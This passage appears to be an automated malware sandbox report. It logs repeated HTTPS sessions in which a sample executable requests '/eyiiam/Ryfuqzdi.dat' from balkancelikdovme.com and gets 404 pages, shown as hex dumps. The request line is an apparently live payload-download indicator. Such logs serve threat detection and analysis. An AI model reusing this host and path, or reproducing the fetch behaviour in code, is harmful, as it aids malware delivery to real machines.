      2025-01-10 22:05:40 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      57192.168.2.449794185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:41 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:41 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:41 GMT
      vary: User-Agent
      2025-01-10 22:05:41 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      58192.168.2.449795185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:42 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:42 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:42 GMT
      vary: User-Agent
      2025-01-10 22:05:42 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      59192.168.2.449802185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:43 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:43 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:43 GMT
      vary: User-Agent
      2025-01-10 22:05:43 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      60192.168.2.449813185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:44 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:44 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:44 GMT
      vary: User-Agent
      2025-01-10 22:05:44 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      61192.168.2.449819185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:45 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:45 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:45 GMT
      vary: User-Agent
      2025-01-10 22:05:45 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      62192.168.2.449825185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:45 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:46 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:46 GMT
      vary: User-Agent
      2025-01-10 22:05:46 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      63192.168.2.449831185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:46 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:47 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:47 GMT
      vary: User-Agent
      2025-01-10 22:05:47 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      64192.168.2.449837185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:47 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:47 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:47 GMT
      vary: User-Agent
      2025-01-10 22:05:47 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      65192.168.2.449845185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:48 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:48 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:48 GMT
      vary: User-Agent
      2025-01-10 22:05:48 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      66192.168.2.449853185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:49 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:49 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:49 GMT
      vary: User-Agent
      2025-01-10 22:05:49 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      67192.168.2.449860185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:50 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:50 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:50 GMT
      vary: User-Agent
      2025-01-10 22:05:50 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      68192.168.2.449866185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:51 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:51 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:51 GMT
      vary: User-Agent
      2025-01-10 22:05:51 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      69192.168.2.449874185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:52 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:52 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:52 GMT
      vary: User-Agent
      2025-01-10 22:05:52 UTC708INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      70192.168.2.449882185.181.116.2174437336C:\Users\user\Desktop\3j7f6Bv4FT.exe
      TimestampBytes transferredDirectionData
      2025-01-10 22:05:53 UTC65OUTGET /eyiiam/Ryfuqzdi.dat HTTP/1.1
      Host: balkancelikdovme.com
      2025-01-10 22:05:53 UTC236INHTTP/1.1 404 Not Found
      Connection: close
      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
      pragma: no-cache
      content-type: text/html
      content-length: 708
      date: Fri, 10 Jan 2025 22:05:53 GMT
      vary: User-Agent
